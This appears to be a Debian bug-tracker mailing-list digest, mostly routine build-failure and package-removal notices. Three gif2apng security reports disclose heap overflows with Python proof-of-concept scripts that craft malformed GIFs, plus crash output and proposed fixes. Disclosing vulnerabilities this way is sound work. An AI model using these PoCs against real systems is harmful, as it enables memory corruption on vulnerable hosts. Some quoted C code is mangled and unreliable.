Processed: libphonenumber-dev: missing dependency on libabsl-dev
Processing control commands: > affects -1 src:kamailio Bug #1005157 [libphonenumber-dev] libphonenumber-dev: missing dependency on libabsl-dev Added indication that 1005157 affects src:kamailio -- 1005157: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005157 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005157: libphonenumber-dev: missing dependency on libabsl-dev
Package: libphonenumber-dev Version: 8.12.41-1 Severity: serious Tags: ftbfs Control: affects -1 src:kamailio https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/kamailio.html ... In file included from cphonenumber.cpp:24: /usr/include/phonenumbers/geocoding/phonenumber_offline_geocoder.h:24:10: fatal error: absl/synchronization/mutex.h: No such file or directory 24 | #include "absl/synchronization/mutex.h" | ^~ compilation terminated. make[4]: *** [Makefile:23: cphonenumber.o] Error 1
Bug#1005154: guacamole-server: frequent test failure on i386
Source: guacamole-server Version: 1.3.0-1 Severity: serious Tags: ftbfs https://tests.reproducible-builds.org/debian/history/i386/guacamole-server.html https://buildd.debian.org/status/logs.php?pkg=guacamole-server=i386 ... not ok 26 - [socket] nested_send_instruction: Assertion failed on socket/nested_send_instruction.c:105: CU_ASSERT_EQUAL(offset,strlen(expected)) FAIL: test_libguac 26 - [socket] nested_send_instruction: Assertion failed on socket/nested_send_instruction.c:105: CU_ASSERT_EQUAL(offset,strlen(expected)) Testsuite summary for guacamole-server 1.3.0 # TOTAL: 26 # PASS: 25 # SKIP: 0 # XFAIL: 0 # FAIL: 1 # XPASS: 0 # ERROR: 0 See src/libguac/tests/test-suite.log make[5]: *** [Makefile:1166: test-suite.log] Error 1
Bug#1005152: pythonmagick: Misbuild when multiple supported python versions and default is newer
Package: pythonmagick Version: 0.9.19-7 Severity: serious Tags: patch Justification: misbuilt User: ubuntu-de...@lists.ubuntu.com Usertags: origin-ubuntu jammy ubuntu-patch Dear maintainers, Well it's me again ;) Ubuntu has switched python3.10 to be the default python, which is *again* causing pythonmagick to misbuild. The reason is that the upstream configure script has a --with-python-min-version option, but not a --with-python-max-version option; so when the version returned by the bare 'python3' command satisfies the min constraint, that's what the build uses. So python3 returns 3.10, which satisfies the >= 3.9 constraint, and both binary builds try to install to the python3.10 path by mistake (despite the python3.9 build having used the correct libboost-python). The attached patch addresses this by explicitly telling configure in its environment what python command to use for each build. I've confirmed that this fixes the build in Ubuntu, so it should also let pythonmagick rebuild correctly when python3.10 becomes the default in Debian (soon). You can probably also drop the use of --with-python-min-version, which is now redundant. Cheers, -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developer https://www.debian.org/ slanga...@ubuntu.com vor...@debian.org diff -Nru pythonmagick-0.9.19/debian/rules pythonmagick-0.9.19/debian/rules --- pythonmagick-0.9.19/debian/rules2022-01-28 05:42:27.0 -0800 +++ pythonmagick-0.9.19/debian/rules2022-02-07 16:11:55.0 -0800 @@ -8,7 +8,8 @@ export PYBUILD_NAME=pythonmagick export PYBUILD_SYSTEM=custom export PYBUILD_CLEAN_ARGS=dh_auto_clean $d; -export PYBUILD_CONFIGURE_ARGS=dh_auto_configure $d -- \ +export PYBUILD_CONFIGURE_ARGS=PYTHON=python{version.major}.{version.minor} \ + dh_auto_configure $d -- \ --disable-silent-rules --disable-static \ --with-python-min-version={version.major}.{version.minor} \ --with-boost-python=boost_python{version.major}{version.minor}
Bug#1005151: xtpcpp FTBFS with libpappsomspp-dev 0.8.48-1
Source: xtpcpp Version: 0.4.43-1.1 Severity: serious Tags: ftbfs https://buildd.debian.org/status/logs.php?pkg=xtpcpp=0.4.43-1.1 ... /<>/src/core/msrun.cpp:44:10: fatal error: pappsomspp/processing/filters/filterpseudocentroid.h: No such file or directory 44 | #include | ^~ compilation terminated. make[4]: *** [src/CMakeFiles/xtpcpp.dir/build.make:690: src/CMakeFiles/xtpcpp.dir/core/msrun.cpp.o] Error 1
Processed: tagging 1001760
Processing commands for cont...@bugs.debian.org: > tags 1001760 + fixed Bug #1001760 {Done: Jose Luis Rivero } [dart] FTBFS: 'placeholders' is ambiguous Added tag(s) fixed. > thanks Stopping processing here. Please contact me if you need assistance. -- 1001760: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1001760 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005147: siftool: ships /usr/bin/test
Package: siftool Version: 2.3.1-1 Severity: critical Justification: what happens if you break /usr/bin/test ? User: debian...@lists.debian.org Usertags: piuparts Hi, during a test with piuparts I noticed your package failed to install because it tries to overwrite other packages files. >From the attached log (scroll to the bottom...): Preparing to unpack .../siftool_2.3.1-1_amd64.deb ... Unpacking siftool (2.3.1-1) ... dpkg: error processing archive /var/cache/apt/archives/siftool_2.3.1-1_amd64.deb (--unpack): trying to overwrite '/usr/bin/test', which is also in package coreutils 8.32-4.1 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/siftool_2.3.1-1_amd64.deb cheers, Andreas coreutils=8.32-4.1_siftool=2.3.1-1.log.gz Description: application/gzip
Bug#997120:
Hello, Thank you very much for this patch, you are absolutely right: your patch fixes the problem! It should also work perfectly well to make the last upstream version (5.0.2) build properly. Andreas started to check on last month but with your patch, it should work. I can confirm anyway that camitk version 5.0.2 builds well with ITK5 with the help of your patch. Best regards, Emmanuel On Mon, 7 Feb 2022 18:09:37 +0100 Jose Luis Rivero wrote: > Hi. I've been looking into the camitk compilation, I think I have a patch > for it. > > The build is currently failing by trying to find the file > CommandLineOptions.ixx.o. Problem is really in > the line above where the compiler does not identify the file > CommandLineOptions.ixx as a valid > c++ file, so the object file is not being generated: > """ > c++: warning: > /build/camitk-o5Au93/camitk-4.1.2/sdk/applications/testactions/CommandLineOptions.ixx: > > linker input file unused because linking not done > "" > > The compiler can be informed about the format of the file by using -x c++ > but the result > won't compile at all since the file seems to be designed to be used in > combination with > other headers (other headers include .ixx at the end of the file). The code > is in the compilation > units via include in other headers, no reason to add it to CMake. > > Removing the .ixx makes the compilation work in an Sid sbuild environment. > """ > +--+ > | Summary > | > +--+ > > Autopkgtest: pass > Build Architecture: amd64 > Build Type: full > Build-Space: 6204608 > Build-Time: 725 > Distribution: unstable > Host Architecture: amd64 > Install-Time: 72 > Job: /home/jrivero/code/debian/camitk_4.1.2-5.dsc > Lintian: warn > Machine Architecture: amd64 > Package: camitk > Package-Time: 801 > Piuparts: pass > Source-Version: 4.1.2-5 > Space: 6204608 > Status: successful > Version: 4.1.2-5 > """ > > Attached is the debdiff. -- Emmanuel Promayon Professeur Univ. Grenoble Alpes - Polytech Grenoble Laboratoire TIMC - équipe GMCAO
Bug#999275: marked as done (libnzb: missing required debian/rules targets build-arch and/or build-indep)
Your message dated Mon, 07 Feb 2022 21:46:53 + with message-id and subject line Bug#1005073: Removed package(s) from unstable has caused the Debian Bug report #999275, regarding libnzb: missing required debian/rules targets build-arch and/or build-indep to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 999275: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=999275 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: libnzb Version: 0.0.20050629-6.2 Severity: important Justification: Debian Policy section 4.9 Tags: bookworm sid User: debian...@lists.debian.org Usertags: missing-build-arch-indep Dear maintainer, Your package does not include build-arch and/or build-indep targets in debian/rules. This is required by Debian Policy section 4.9, since 2012. https://www.debian.org/doc/debian-policy/ch-source.html#main-building-script-debian-rules Please note that this is also a sign that the packaging of this software could benefit from a refresh. For example, packages using 'dh' cannot be affected by this issue. This mass bug filing was discussed on debian-devel@ in https://lists.debian.org/debian-devel/2021/11/msg00052.html . The severity of this bug will be changed to 'serious' after a month. Best, Lucas --- End Message --- --- Begin Message --- Version: 0.0.20050629-6.2+rm Dear submitter, as the package libnzb has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1005073 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Bug#965670: marked as done (libnzb: Removal of obsolete debhelper compat 5 and 6 in bookworm)
Your message dated Mon, 07 Feb 2022 21:46:53 + with message-id and subject line Bug#1005073: Removed package(s) from unstable has caused the Debian Bug report #965670, regarding libnzb: Removal of obsolete debhelper compat 5 and 6 in bookworm to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 965670: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965670 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: libnzb Version: 0.0.20050629-6.2 Severity: normal Usertags: compat-5-6-removal Hi, The package libnzb uses debhelper with a compat level of 5 or 6, which is deprecated and scheduled for removal[1]. Please bump the debhelper compat at your earliest convenience /outside the freeze/! * Compat 13 is recommended (supported in stable-backports) * Compat 7 is the bare minimum PLEASE KEEP IN MIND THAT the release team *DOES NOT* accept uploads with compat bumps during the freeze. If there is any risk that the fix for this bug might not migrate to testing before 2021-01-01[3] then please postpone the fix until after the freeze. At the time of filing this bug, compat 5 and 6 are expected to be removed "some time during the development cycle of bookworm". Thanks, ~Niels [1] https://lists.debian.org/debian-devel/2020/07/msg00065.html [2] https://release.debian.org/bullseye/FAQ.html [3] The choice of 2021-01-01 as a "deadline" is set before the actual freeze deadline to provide a safe cut off point for most people. Mind you, it is still your responsibility to ensure that the upload makes it into testing even if you upload before that date. --- End Message --- --- Begin Message --- Version: 0.0.20050629-6.2+rm Dear submitter, as the package libnzb has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1005073 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Bug#1004510: marked as done (asterisk-opus: Depends on asterisk-1fb7f5c06d7a2052e38d021b3d8ca151 which is gone)
Your message dated Mon, 07 Feb 2022 21:45:50 + with message-id and subject line Bug#1004989: Removed package(s) from unstable has caused the Debian Bug report #1004510, regarding asterisk-opus: Depends on asterisk-1fb7f5c06d7a2052e38d021b3d8ca151 which is gone to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1004510: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004510 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: asterisk-opus Version: 13.7+20171009-2 Severity: serious X-Debbugs-CC: debian...@lists.debian.org, aster...@packages.debian.org Tags: sid bookworm User: debian...@lists.debian.org Usertags: needs-update Control: affects -1 src:asterisk Dear maintainer(s), With a recent upload of asterisk the autopkgtest of asterisk-opus fails in testing when that autopkgtest is run with the binary packages of asterisk from unstable. It passes when run with only packages from testing. In tabular form: passfail asterisk from testing1:16.23.0~dfsg+~cs6.10.20220309-2 asterisk-opus from testing13.7+20171009-2 all others from testingfrom testing I copied some of the output at the bottom of this report. Currently this regression is blocking the migration of asterisk to testing [1]. Of course, asterisk shouldn't just break your autopkgtest (or even worse, your package), but it seems to me that the change in asterisk was intended and your package needs to update to the new situation. If this is a real problem in your package (and not only in your autopkgtest), the right binary package(s) from asterisk should really add a versioned Breaks on the unfixed version of (one of your) package(s). Note: the Breaks is nice even if the issue is only in the autopkgtest as it helps the migration software to figure out the right versions to combine in the tests. More information about this bug and the reason for filing it can be found on https://wiki.debian.org/ContinuousIntegration/RegressionEmailInformation Paul [1] https://qa.debian.org/excuses.php?package=asterisk https://ci.debian.net/data/autopkgtest/testing/amd64/a/asterisk-opus/18793117/log.gz autopkgtest: WARNING: Test dependencies are unsatisfiable - calling apt install on test deps directly for further data about failing dependencies in test logs Reading package lists... Building dependency tree... Reading state information... Starting pkgProblemResolver with broken count: 1 Starting 2 pkgProblemResolver with broken count: 1 Investigating (0) asterisk-opus:amd64 < none -> 13.7+20171009-2 @un puN Ib > Broken asterisk-opus:amd64 Depends on asterisk-1fb7f5c06d7a2052e38d021b3d8ca151:amd64 < none @un H > Considering asterisk:amd64 10001 as a solution to asterisk-opus:amd64 Broken asterisk-opus:amd64 Depends on libopus0:amd64 < none | 1.3.1-0.1 @un uH > (>= 1.1) Considering libopus0:amd64 0 as a solution to asterisk-opus:amd64 Re-Instated libopus0:amd64 Broken asterisk-opus:amd64 Depends on libopusfile0:amd64 < none | 0.9+20170913-1.1 @un uH > (>= 0.5) Considering libopusfile0:amd64 0 as a solution to asterisk-opus:amd64 Re-Instated libopusfile0:amd64 Done Some packages could not be installed. This may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of Incoming. The following information may help to resolve the situation: The following packages have unmet dependencies: asterisk-opus : Depends: asterisk-1fb7f5c06d7a2052e38d021b3d8ca151 E: Unable to correct problems, you have held broken packages. module-loadable FAIL badpkg blame: asterisk-opus OpenPGP_signature Description: OpenPGP digital signature --- End Message --- --- Begin Message --- Version: 13.7+20171009-2+rm Dear submitter, as the package asterisk-opus has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1004989 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing
Bug#1004170: marked as done (rust-rand-os - abandoned upstream should this package be removed?)
Your message dated Mon, 07 Feb 2022 21:46:25 + with message-id and subject line Bug#1005020: Removed package(s) from unstable has caused the Debian Bug report #1004170, regarding rust-rand-os - abandoned upstream should this package be removed? to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1004170: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004170 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: rust-rand-os Version: 0.2.2-2 I started looking at updating rust-rand to 0.8. It looks like rust-rand-os has been abandoned upstream, the upstream description says "This crate is deprecated: OsRng is available in rand_core since version 0.5.1." The crate has not been updated for the new versions of rand-core and getrandom. and no longer appears in the master branch of the upstream git repository. There do not appear to be any reverse dependencies or build-dependencies on this package in Debian. The only reference I can find is a "x-cargo-built-using" in nitrocli, which should probablly be dealt with before this package goes away. Other than that, can anyone think of a reason to keep this crate around? --- End Message --- --- Begin Message --- Version: 0.2.2-2+rm Dear submitter, as the package rust-rand-os has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1005020 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Bug#1002687: marked as done (gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function)
Your message dated Mon, 07 Feb 2022 21:43:10 + with message-id and subject line Bug#1004933: Removed package(s) from unstable has caused the Debian Bug report #1002687, regarding gif2apng: CVE-2021-45911: Heap based buffer overflow in processing of delays in the main function to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002687: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002687 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, There is a heap based buffer overflow in the main function of the gif2apng application. The responsible code looks as follows: delays = (unsigned short *)malloc(frames*2); if (delays == NULL) return 1; [...] if (val == 0xF9) { if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 2, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; has_t = flags & 1; dispose_op = (flags >> 2) & 7; if (dispose_op > 3) dispose_op = 3; if (dispose_op == 3 && n == 0) dispose_op = 2; if (delay > 1) delays[n] = delay; } The variable n is used to count the frames. The problem is that if we enter the if statement at the very end of the gif file, then n is equal to frames. This means, that the write to the delays buffer overwrites the two bytes after the delays buffer. The following script generates a poc.gif file, that should cause a crash: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") sig = b"GIF87a" w = b"\x10\x00" h = b"\x10\x00" flags_one = b"\x00" bcolor = b"\x01" aspect = b"\x01" data = sig + w + h + flags_one + bcolor + aspect f.write(data) # Writting more frames to produce crash: for i in range(0,28): # Going into the id 0x2c path, so that there is a frame id = b"\x2c" w0 = b"\x01\x00" y0 = b"\x00\x00" x0 = b"\x00\x00" h0 = b"\x01\x00" # Getting past our own size checks flags_two = b"\x00" data = id + x0 + y0 + w0 + h0 + flags_two f.write(data) # DecodeLZW mincode = b"\x07" f.write(mincode) for i in range(0,512): # Size value and byte we write to the heap target_char = b"\x01" + b"A" f.write(target_char) # Resetting the values using "clearcode" to keep the code path as simple as possible clear_code = b"\x01" + b"\x80" f.write(clear_code) # Leaving function target_char = b"\x00" f.write(target_char) # Triggering the vulnerable code path id = b"\x21" val = b"\xf9" size = b"\xff" flags_two = b"\x00" delay = b"\xff\xff" t = b"\x00" end = b"\x00" data = id + val + size + flags_two + delay + t + end f.write(data) # Breaking out of while loop f.write(b"") f.close() The generated poc.gif file causes a memory curruption on the heap when converted with the current gif2apng version: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... 28 frames. Writing 'poc.png'... 28 frames. munmap_chunk(): invalid pointer Abgebrochen This buffer overflow allows an attacker to write two arbitrary bytes after the delays buffer. I did a rudimentary fix in my local version of the program by adding a boundary check to the if statement in the code: if (val == 0xF9) { if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 2, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; if (fread(, 1, 1, f1) != 1) return 1; has_t = flags & 1; dispose_op = (flags >> 2) & 7; if (dispose_op > 3) dispose_op = 3; if (dispose_op == 3 && n == 0) dispose_op = 2; if (delay > 1 && n < frames) { delays[n] = delay; } } This fixed the crash for me locally. However I am not sure if this is a clean solution as I have no idea if this can happen in a valid image. If this code path is not possible in a valid image it might be better to stop processing the image at this point. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE,
Bug#1002668: marked as done (gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function)
Your message dated Mon, 07 Feb 2022 21:43:10 + with message-id and subject line Bug#1004933: Removed package(s) from unstable has caused the Debian Bug report #1002668, regarding gif2apng: CVE-2021-45909: Heap based buffer overflow in the DecodeLZW function to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002668: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002668 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, There is a heap based buffer overflow in the gif2apng package. The vulnerability is located in the DecodeLZW function in the gif2apng.cpp file. The problem here is, that this function writes to a buffer, that was allocated using malloc without checking the size of this buffer. Therefore it is possible to provide a gif to the program, that contains more data than fits into this buffer leading to a memory corruption on the heap. I wrote the following poc script in python: #!/bin/python3 # Writing to poc.gif f = open("poc.gif", "wb") # Data needed to enter the code path: beginning = b"GIF87a" + b"\x10\x00\x10\x00" + b"\x01" * 3 + b"\x2c" + b"\x01" * 9 f.write(beginning) # Value needed in the vulnerable function mincode = b"\x07" f.write(mincode) for i in range(0,1): # Size value and byte we write to the heap target_char = b"\x01" + b"A" f.write(target_char) # Resetting the values using "clearcode" to keep the code path as simple as possible clear_code = b"\x01" + b"\x80" f.write(clear_code) f.close() This script creates a file called poc.gif, which writes 1 "A"'s into a buffer of size 512 leading to memory corruption on the heap. I tested this on Debian 10 using the current version of the package from the testing repository and got the following output: $ gif2apng -i0 poc.gif /dev/null gif2apng 1.9 using ZLIB Reading 'poc.gif'... 1 frames. malloc(): corrupted top size Abgebrochen This vulnerability seems to allow a write of an arbitrary number of arbitrary bytes. Therefore I think it likely, that this could be exploited. To fix this issue locally I added a buffer_size variable to the main function, which holds the size of the allocated buffer (the imagesize value used initially for the allocation was overwritten at some point). I then passed this value to the DecodeLZW function and added two if-statements around the writes to the the buffer to check whether the buffer can hold more bytes. My code looks as follows: void DecodeLZW(unsigned char * img, unsigned int img_size, FILE * f1) // added parameter img_size { unsigned int bytes_written = 0; [...] if (lastcode == -1) { if (bytes_written < img_size) { // Added if-statement *pout++ = suffix[code]; bytes_written++; } else { printf("Invalid image size\n"); exit(0); } firstchar = lastcode = code; continue; } [...] do { if (bytes_written < img_size) { // Added if-statement *pout++ = *--pstr; bytes_written++; } else { printf("Invalid image size\n"); exit(0); } } while (pstr > str); [...] int main(int argc, char** argv) { unsigned int buffer_size = 0; // New variable to hold the size of the buffer [...] grayscale = 1; buffer_size = imagesize*2; // New variable, as imagesize is overwritten at some point buffer = (unsigned char *)malloc(buffer_size); if (buffer == NULL) { printf("Error: not enough memory\n"); return 1; } [...] DecodeLZW(buffer, buffer_size, f1); // Added buffer_size [...] DecodeLZW(buffer, buffer_size, f1); // Added Buffer size [...] This compiled successfully and fixed the buffer overflow for me. I am however not sure if this is the cleanest way to fix the issue and it could use some more testing. Best regards Kolja -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores) Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8
Bug#1002667: marked as done (gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function)
Your message dated Mon, 07 Feb 2022 21:43:10 + with message-id and subject line Bug#1004933: Removed package(s) from unstable has caused the Debian Bug report #1002667, regarding gif2apng: CVE-2021-45910: Heap based buffer overflow in the main function to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002667 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gif2apng Version: 1.9+srconly-3 Severity: important Tags: security Dear Maintainer, I found a heap overflow in the main function of the gif2apng application. The issue exists within the for loops in the following code from the main function in gif2apng.cpp: if (coltype == 2) { for (j=0; jh2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + ((k+y0)*w + x0)*3; for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + (k+y0)*w + x0; if (shuffle) { for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + ((k+y0)*w + x0)*3; if ( ( (j*w0 + w0) > buffer_size) || ( k+y0)*w + x0)*3) + w0 * 3 ) > imagesize) || k+y0)*w + x0)*3) < 0 ) || ( (j*w0) < 0)) { printf("Something is wrong with the size values\n"); exit(0); } for (i=0; ih2) ? (j-h2)*2-1 : (j>h2/2) ? (j-h2/2)*4-2 : (j>h2/4) ? (j-h2/4)*8-4 : j*8; src = buffer + j*w0; dst = frame0 + (k+y0)*w + x0; if ( ( (j*w0 + w0) > buffer_size) || ( (((k+y0)*w + x0) + w0 ) > imagesize) || k+y0)*w + x0)) < 0 ) || ( (j*w0) < 0)) { printf("Something is wrong with the size values\n"); exit(0); } if (shuffle) { for (i=0; i -- no debconf information --- End Message --- --- Begin Message --- Version: 1.9+srconly-3+rm Dear submitter, as the package gif2apng has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1004933 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---
Processed: update bts with meta info
Processing commands for cont...@bugs.debian.org: > reassign 1004506 src:theseus 3.3.0-10 Bug #1004506 {Done: Andreas Tille } [src:muscle, src:theseus] muscle breaks theseus autopkgtest: Unknown option maxiters Bug reassigned from package 'src:muscle, src:theseus' to 'src:theseus'. No longer marked as found in versions muscle/1:5.1-1 and theseus/3.3.0-10. No longer marked as fixed in versions theseus/3.3.0-11. Bug #1004506 {Done: Andreas Tille } [src:theseus] muscle breaks theseus autopkgtest: Unknown option maxiters Marked as found in versions theseus/3.3.0-10. > fixed 1004506 3.3.0-11 Bug #1004506 {Done: Andreas Tille } [src:theseus] muscle breaks theseus autopkgtest: Unknown option maxiters Marked as fixed in versions theseus/3.3.0-11. > affects 1004506 src:muscle Bug #1004506 {Done: Andreas Tille } [src:theseus] muscle breaks theseus autopkgtest: Unknown option maxiters Added indication that 1004506 affects src:muscle > thanks Stopping processing here. Please contact me if you need assistance. -- 1004506: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004506 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005144: fwupd-*-signed-template: Build-Depends missing epoch
Source: fwupd-efi Version: 1:1.2-2 Severity: serious The generated fwupd-amd64-signed 1:1.2+2 source package has: +--- | Build-Depends: [...] fwupd-unsigned (>= 1.2-2) [amd64], fwupd-unsigned (<< 1.2-3) [amd64] +--- This is not satisfiable as the current version of fwupd-unsigned is 1:1.2-2. The build dependency is missing the epoch. Ansgar
Bug#1005143: src:kamailio: fails to migrate to testing for too long: FTBFS on armhf, mips*el and s390x
Source: kamailio Version: 5.4.4-1 Severity: serious Control: close -1 5.5.3-1 Tags: sid bookworm ftbfs User: release.debian@packages.debian.org Usertags: out-of-sync Dear maintainer(s), The Release Team considers packages that are out-of-sync between testing and unstable for more than 60 days as having a Release Critical bug in testing [1]. Your package src:kamailio has been trying to migrate for 61 days [2]. Hence, I am filing this bug. Your package fails to build from source on several architectures where it built before. If a package is out of sync between unstable and testing for a longer period, this usually means that bugs in the package in testing cannot be fixed via unstable. Additionally, blocked packages can have impact on other packages, which makes preparing for the release more difficult. Finally, it often exposes issues with the package and/or its (reverse-)dependencies. We expect maintainers to fix issues that hamper the migration of their package in a timely manner. This bug will trigger auto-removal when appropriate. As with all new bugs, there will be at least 30 days before the package is auto-removed. I have immediately closed this bug with the version in unstable, so if that version or a later version migrates, this bug will no longer affect testing. I have also tagged this bug to only affect sid and bookworm, so it doesn't affect (old-)stable. If you believe your package is unable to migrate to testing due to issues beyond your control, don't hesitate to contact the Release Team. Paul [1] https://lists.debian.org/debian-devel-announce/2020/02/msg5.html [2] https://qa.debian.org/excuses.php?package=kamailio OpenPGP_signature Description: OpenPGP digital signature
Processed: src:kamailio: fails to migrate to testing for too long: FTBFS on armhf, mips*el and s390x
